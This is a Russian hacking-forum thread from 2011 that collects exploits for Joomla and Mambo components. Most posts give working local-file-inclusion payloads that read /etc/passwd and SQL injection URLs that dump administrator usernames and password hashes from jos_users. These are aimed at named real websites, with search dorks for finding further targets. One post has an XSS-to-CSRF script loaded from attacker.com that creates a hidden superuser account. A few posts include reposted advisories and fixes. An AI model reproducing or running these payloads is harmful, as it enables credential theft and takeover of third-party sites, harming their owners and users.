Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

z0mbyak · 10 Apr 2011

LFI in Joomla component com_immobilien

Доброго времени суток, уважаемые форумчане.

Тип: LFI
Компонент: com_immobilien
Версия: Не знаю, тк шелл не залил
Найдена: 10.04.2011 by z0mbyak
Dork: inurl:"com_immobilien"

Vuln Code: Не искал)))

Link:
index.php?option=com_immobilien&controller=

Exploit:
../../../../../../../../../../../etc/passwd%00

PoC:

http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00

http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00

P.S Вроде не боян)

z0mbyak · 10 Apr 2011

Multiple Vulnerabilities in Jomla Component com_tender

И снова здравствуйте)

Тип: LFI
exploit: ../../../../../../../../../../etc/passwd%00

PoC:
http://www.moscow-tenders.ru/index.php?option=com_tender&controller=../../../../../../../../../../etc/passwd%00

Тип: Sql Inj

Вообще, массового я так и не нашел, но компонент очень дырявый)

PoC:

http://irp.omsk.info/index.php?option=com_tender&view=list&filter_type=category&filter_category%5B%5D=327&Itemid=5&completed=-1+union+select+1,2,3,4,5,concat(username,0x3a,password,0x3a,usertype),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users+where+usertype='Super%20Administrator'--

https://www.itbidding.com/index.php?option=com_tender&act=opening_tender&action=edit_opening_tender&gov_tender_id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

P.S. Надеюсь не баян)))

z0mbyak · 20 Apr 2011

SQL-Inj in Joomla com_tpjobs

Доброго времени суток, уважаемые форумчане.

В данном компоненте уже находили BSQL-Inj
(http://www.exploit-db.com/exploits/10950)
Но есть и по проще варианты)

Например:

уязвимость в параметре id, при task=detailjob

Код:
Code:
//detailJob
function detailJob($option){
	global $mainframe;
	$user	=& JFactory::getUser();
	$id 	= JRequest::getVar('id', 0, 'get', 'string');

	if(empty($id))
	{
		$return	= JRoute::_('index.php?option=com_tpjobs');
		$mainframe->redirect( $return );	
	}

	$db 	= & JFactory::getDBO();		
	$query = "select a.*,comp_name,degree_level,pos_type,type_salary,g.country,i.industry,e.exp_name from #__tpjobs_job a".
	         " LEFT JOIN #__tpjobs_degree_level b ON a.id_degree_level = b.id".
			 " LEFT JOIN #__tpjobs_pos_type c ON a.id_pos_type = c.id".
			 " LEFT JOIN #__tpjobs_type_salary d ON a.id_salary_type = d.id".
			 " LEFT JOIN #__tpjobs_job_exp e ON a.id_job_exp = e.id".
			 " LEFT JOIN #__tpjobs_job_spec f ON a.id_job_spec = f.id".
			 " LEFT JOIN #__tpjobs_country g ON a.id_country = g.id". 
			 " LEFT JOIN #__tpjobs_employer h ON a.employer_id = h.user_id".
			 " LEFT JOIN #__tpjobs_industry i ON h.id_industry = i.id".
			 " where a.id = ".$id;	
	$db->setQuery( $query);
	
	$data = $db->loadObjectList();
	if(!count($data))
	{
		$return	= JRoute::_('index.php?option=com_tpjobs');
		$mainframe->redirect( $return );	
	}
	
	HTML_front_tpjobs::detailJob($data,$option);
}
В итоге нам нужно только подобрать кол-во колонок через order+by (за частую ~20-30)

POC:

http://bankihr.by/index.php?option=com_tpjobs&task=detailjob&id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

http://www.ingenjorstorget.se/index.php?option=com_tpjobs&task=detailjob&id=999999999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat%28username,0x3a,password,0x3a,usertype%29,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--

Jаger · 21 Apr 2011

Joomnik
Sql Injection:

Need: Maqic_Quotes = Off

/index.php

http://localhost/index.php?option=com_joomnik&album=9' and 1!=1 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users where gid=25 limit 0,1-- 1

eclipse · 28 Apr 2011

Kunena Forum

Активная XSS

Уязвимый компонент:Kunena Forum, версии <1.6
Уязвимое поле:name, на странице редактировании профиля
Exploit:

"><script>JS</script>
Click to expand...

Dork:inurl:/index.php/component/kunena

Автор: eclipse

eclipse · 2 Jun 2011

juser_bestbefore

Раскрытие путей при обращении к скрипту juser_bestbefore.php

Причина:
Отсутствует инициализация глобальной переменной $maingrame, в следствии чего возникает фатальная ошибка
Code:
[COLOR=Red]Call to a member function isAdmin() on a non-object in[/COLOR]
код содержащий ошибку
Code:
function onAfterInitialise() {	// latest user log-in details have been updated at this stage
		global $mainframe;

		// Not for admin backend
		if ($mainframe->isAdmin()) {
			return;
		}
	...
	}
Исправление:
Перед использованием добавить инициализацию переменной
Code:
$mainframe = JFactory::getApplication();
Автор: eclipse

z0mbyak · 13 Jun 2011

SQl-Inj в компоненте com_prywatne

Тип: Sql-Inj
Модуль: com_prywatne
Dork: inurl:"index.php?option=com_prywatne"

Данный компонент установлен только на одном сайте, но мало ли вдруг пригодится.

Exploit:

+union+select+group_concat(username,0x3a,password,0x3a,usertype)+from+jos_users--

PoC:

http://infomedic.mentax.pl/old_site/index.php?option=com_prywatne&sid=30&mid=0&pid=34+union+select+group_concat(username,0x3a,password,0x3a,usertype)+from+jos_users--

z0mbyak · 23 Jun 2011

Joomla com_com_propiedades Multiple

# Exploit Title: Joomla com_com_propiedades Multiple Vulnerabilities
# Date: 23.06.2011
# Author: z0mbyak
# Vendor or Software Link: find by yourself
# Version: Don't know
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_propiedades"
# Tested on: FreeBSD

LFI Vulnerability:

exploit: ../../../../../../../../../../../../etc/passwd%00
VulnSite: http://www.arifmetika.com.ua/index.php?option=com_propiedades&controller=../../../../../../../../../../../etc/passwd%00

SQL-Inj Vulnerability:

exploit: null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0
VulnSite: http://www.diplomat-kurgan.ru/index.php?option=com_propiedades&task=search&id_provincia=null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0

P.S. Вообще инъекцию я крутил через пост, так как поиск на аяксе, но специально для особо ленивых размещаю гет)

Специально для forum.antichat.ru и rdot.org/forum/

z0mbyak.

drift · 2 Jul 2011

Joomla mdigg Component SQL Injection Vulnerability

=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####

[*] ExpLo!T :

http://127.0.0.1/?act=story_lists&task=item&link_id=1'

http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]

http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
============================================================================================ |
Click to expand...

абвгдешка · 12 Jul 2011

Joomla 1.6.3 CSRF Exploit

Code:

This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.

/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
 
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>
 
*/
document.writeln('<iframe id="iframe" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></iframe>');
 
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
 
document.getElementById("iframe").contentDocument.forms[0].jform_name.value = name;
document.getElementById("iframe").contentDocument.forms[0].jform_username.value = username;
document.getElementById("iframe").contentDocument.forms[0].jform_password.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_password2.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_email.value = email;
document.getElementById("iframe").contentDocument.forms[0].getElementById("1group_8").checked=true;
document.getElementById("iframe").contentDocument.getElementsByTagName("a")[11].onclick();
}

z0mbyak · 18 Jul 2011

Joomla com_yvhotels SQL-inj Vuln

# Exploit Title: Joomla com_yvhotels SQL-inj Vuln
# Date: 18.07.2011
# Author: z0mbyak
# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html
# Version: 1.1.1
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_yvhotels"
# Tested in: web

Code:

function show_info( $task ) {

$id = mosGetParam($_REQUEST, 'id');
switch($task) {

case 'desc':
show_hotel_desc( $id );
break;

case 'facils':
show_hotel_facils( $id );
break;

case 'rooms':
show_hotel_rooms( $id );
break;

case 'address':
show_hotel_address( $id );
break;

}
}

function show_hotel_desc( $id ) {
global $database;

$database->setQuery( "SELECT * FROM #__yvhotels WHERE id=$id");

$rows = $database->loadObjectList();
if ($database->getErrorNum()) {
echo $database->stderr();
return false;
}
$row = $rows[0];

HTML_yvhotels_front::show_hotel_desc( $row );
}
Click to expand...

SQL-Inj Vulnerability:

exploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11,12,database(),version(),15,16,17,18,19,20,21--

VulnSite:
http://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,9,10,11,12,database%28%29,version%28%29,15,16,17,18,19,20,21--

Специально для forum.antichat.ru и rdot.org/forum/

z0mbyak.

абвгдешка · 22 Jul 2011

Joomla Component mod_spo SQL Injection Vulnerability

# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7

Simple Page Option – LFI
Vulnerable-Code:
$s_lang
=& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=

Expl0iting:
http://www.xxx.com/home/modules/mod_spo/[email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>&spo_f_email[0][email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using[/CODE]
%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Reparing?:
Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.

z0mbyak · 26 Jul 2011

Joomla com_hitexam SQL-Inj

Что?? Моя любимая тема на второй позиции??? Не порядок)

Дата: 26,07,2011 16:00
Продукт: Joomla component com_hitexam, скачать _http://www.jomexperts.com/download/doc_details/5-hitexam.html?tmpl=component

Уязвимость: SQL-Inj

Автор: z0mbyak

Тип: удалённая
Опасность: 7 (так как это не прямая заливка и возможность закрыться сторонними фильтрами, например sweb)
Описание: Уязвимость существует из-за недостаточной фильтрации входящих данных:

PHP код:
function getLevels($id){
$db = $this->getDBO();
$sql = "select l.level,l.description,l.id as l_id,s.name,s.id from #__exam_levels as l, #__exam_ques_bank as q,#__exam_subjects as s where q.lvl_id=l.id and s.id=q.sub_id and q.published=1 and q.sub_id=$id";
$db->setQuery($sql);
$results = $db->loadObjectList();
return $results;
}

Эксплоит:
_http://www.e-v-r.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger
_http://www.mira15.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger

dork: inurl:"index.php?option=com_hitexam"

Для устранения уязвимости, нужно просто должным образом фильтровать входящие данные)

P.S. Извини Dark, не удержался, я вообще щедрый)))

абвгдешка · 1 Aug 2011

Joomla Component (com_obSuggest) Local File Inclusion Vulnerability

Code:

   )   )            )                     (   (         (   (    (       )     )
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
                                        .WEB.ID
 
-----------------------------------------------------------------------
 
Joomla Component obSuggest Local File Inclusion Vulnerability
 
Author     : v3n0m
Discovered : July, 31-2011 GMT +7:00 Jakarta, Indonesia
Software   : obSuggest - Uservoice for Joomla
Developer  : http://foobla.com/
License    : GPLv2 or later
Tested On  : Joomla 1.5.x
Dorks      : inurl:com_obsuggest
-----------------------------------------------------------------------
 
Proof of Concept:
----------------
http://127.0.0.1/[path]/index.php?option=com_obsuggest&controller=[LFI]%00
 
Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id

z0mbyak · 2 Aug 2011

Joomla com_adagency SQl-Inj

#Продукт: com_adagency
#Тип уязвимости: SQL-Inj
#Автор: z0mbyak

Exploit: /index.php?option=com_adagency&controller=adagencyPackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version()--

PoC:
http://www.charliesheens-korner.com/index.php?option=com_adagency&controller=adagencyPackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--

http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyPackages&task=preview&tmpl=component&no_html=0&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--

Специально для forum.antichat.ru и rdot.org/forum/

z0mbyak · 2 Aug 2011

Joomla com_ag_vodmatvil SQl-Inj

#Продукт: com_ag_vodmatvil
#Тип: SQL-Inj
#Автор: z0mbyak

#exploit: /index.php?option=com_ag_vodmatvil&controller=categories&task=category&cid=-1+union+select+1,group_concat(username,0x3a,password,0x3a,usertype),3+from+jos_users--&Itemid=20

PoC:

http://tube.by/index.php?option=com_ag_vodmatvil&controller=categories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,password,0x3a,usertype%29,3+from+jos_users--&Itemid=20

http://vod.solo.by/index.php?option=com_ag_vodmatvil&controller=categories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,password,0x3a,usertype%29,3+from+jos_users--&Itemid=20
P.S. Вот, блин, мне делать нефиг)

Специально для forum.antichat.ru и rdot.org/forum/

абвгдешка · 4 Aug 2011

Joomla Component (com_jdirectory) SQL Injection Vulnerability

Code:

=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/ 
            Exploit-ID is the Exploit Information Disclosure
  
Web             : exploit-id.com   
e-mail          : root[at]exploit-id[dot]com            
  
                     #########################################           
               I'm Caddy-Dz, member of Exploit-Id              
             #########################################           
======================================================================
  
####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####
  
  
[*] ExpLo!T :
  
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
  
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here
  
  
####
 
[+] Peace From Algeria
  
####
 
=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
  RmZ ...others                                                                              |
============================================================================================ |

абвгдешка · 10 Aug 2011

TNR Enhanced Joomla Search <= SQL Injection Vulnerability

Code:

=========================================================================================
  
  [o] TNR Enhanced Joomla Search <= SQL Injection Vulnerability
   
       Software : com_esearch ver 3.0.0
       Vendor   : http://www.tnrjoomla.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Home     : http://evilc0de.blogspot.com/
 
=========================================================================================
 
  [o] Exploit
  
       http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]
 
 
  [o] PoC
 
       http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
 
 
  [o] Dork
 
       u all know what the dork is right? :))
 
=========================================================================================
 
  [o] Greetz
 
       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe matthews wishnusakti kaka11 inc0mp13te martfella
       pizzyroot Genex H312Y }^-^{ noname tukulesto
 
=========================================================================================
 
  [o] August 07 2011 - Papua, Indonesia

Moriarty · 11 Aug 2011

Joomla Fastball component [SQL Injection]

Dork : inurl:"option=com_fastball"
About 1,370,000 results

exploit:
Code:
http://j15/index.php?option=com_fastball&league=[B][COLOR=Red]123+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9,10,11+from+jos_users--[/COLOR][/B]
Веселитесь...

eclipse · 16 Aug 2011

Множественные уязвимости вида "Межсайтовый скриптинг" в Joomla всех версий от 1.6.x до 1.7.0 RC

List: bugtraq
Subject: Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
From: YGN Ethical Hacker Group <lists () yehg ! net>
Date: 2011-07-22 3:16:57
Message-ID: CAPYM6VyqAzsUA_qV2n4q9N8dvuZZWadn2us9aZTH08udvQm89A () mail ! gmail ! com
[Download message RAW]

Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS)
Vulnerabilities

1. OVERVIEW

Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple
Cross Site Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
modelтАУviewтАУcontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.

3. VULNERABILITY DESCRIPTION

Several parameters (searchword, Request URI) in Joomla! Core
components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.

4. VERSION AFFECTED

1.7.0-RC and all versions of 1.6.x

5. PROOF-OF-CONCEPT/EXPLOIT

component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================
N.B. Our previous reported issue (1.6.3) of "searchword" parameter XSS
was not fixed completely.

[REQUEST]
POST /joomla164_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla164_noseo/
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCha \
rCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102, \
114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,1 \
11,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));al \
ert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsss \
ssssssss&option=com_search [/REQUEST]

XSS in Request URI
====================
File: ./includes/application.php
Line: 176, 181
Code: $document->setBase(JURI::current()); // instead of
$document->setBase(htmlspecialchars(JURI::current()));

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/new-feed-categories/'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/24-joomla'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/search-compone \
nt/search/'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/site-map/contacts/'"><script>alert(/XSS/)</script \
>

http://localhost/joomla164/index.php/component/banners/click/3'"><script>alert(/XSS/)< \
/script>

http://localhost/joomla164/index.php/fruit-encyclopedia/'"><script>alert(/XSS/)</scrip \
t>

http://localhost/joomla164/index.php/fruit-encyclopedia/38-a'"><script>alert(/XSS/)</s \
cript>

http://localhost/joomla164/index.php/fruit-encyclopedia/39-b'"><script>alert(/XSS/)</s \
cript>

http://localhost/joomla164/index.php/fruit-encyclopedia/57-t'"><script>alert(/XSS/)</s \
cript>

http://localhost/joomla164/index.php/growers/23-happy-orange-orchard'"><script>alert(/ \
XSS/)</script>

http://localhost/joomla164/index.php/image-gallery/animals/25-koala'"><script>alert(/X \
SS/)</script>

http://localhost/joomla164/index.php/image-gallery/scenery/64-blue-mountain-rain-fores \
t'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/image-gallery/scenery/65-ormiston-pound'"><script \
>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/34-park-site/'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/34-park-site/2-webmaster'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/35-shop-site/'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/35-shop-site/8-shop-address'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised/'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised/67-whats-new-in-15'"><script>alert(/XSS/)</scrip \
t>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-categories/26-park-site'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-categories/29-fruit-shop-site'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/20-extensions'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/24-joomla'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/1-joomla-announcements'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/2-new-joomla-extensions'"><script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/3-joomla-security-news'"><script>alert(/XSS/)</script>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.

7. SOLUTION

The development of Joomla! 1.6.x has been ceased; there will be no
fixed version for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.

8. VENDOR

Joomla! Developer Team
http://www.joomla.org

9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

10. DISCLOSURE TIME-LINE

2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0, released
2011-07-22: vulnerability disclosed

11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(X \
SS) Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(X \
SS) http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html

#yehg [2011-07-22]
Click to expand...

Источник: http://marc.info/?l=bugtraq&m=131160497113679&w=2

Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

z0mbyak Active Member

z0mbyak Active Member

z0mbyak Active Member

Jаger Banned

eclipse Member

eclipse Member

z0mbyak Active Member

z0mbyak Active Member

drift New Member

абвгдешка Member

z0mbyak Active Member

абвгдешка Member

z0mbyak Active Member

абвгдешка Member

z0mbyak Active Member

z0mbyak Active Member

абвгдешка Member

абвгдешка Member

Moriarty Member

eclipse Member

Useful Searches

Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

z0mbyak Active Member

z0mbyak Active Member

z0mbyak Active Member

Jаger Banned

eclipse Member

eclipse Member

z0mbyak Active Member

z0mbyak Active Member

drift New Member

абвгдешка Member

z0mbyak Active Member

абвгдешка Member

z0mbyak Active Member

абвгдешка Member

z0mbyak Active Member

z0mbyak Active Member

абвгдешка Member

абвгдешка Member

Moriarty Member

eclipse Member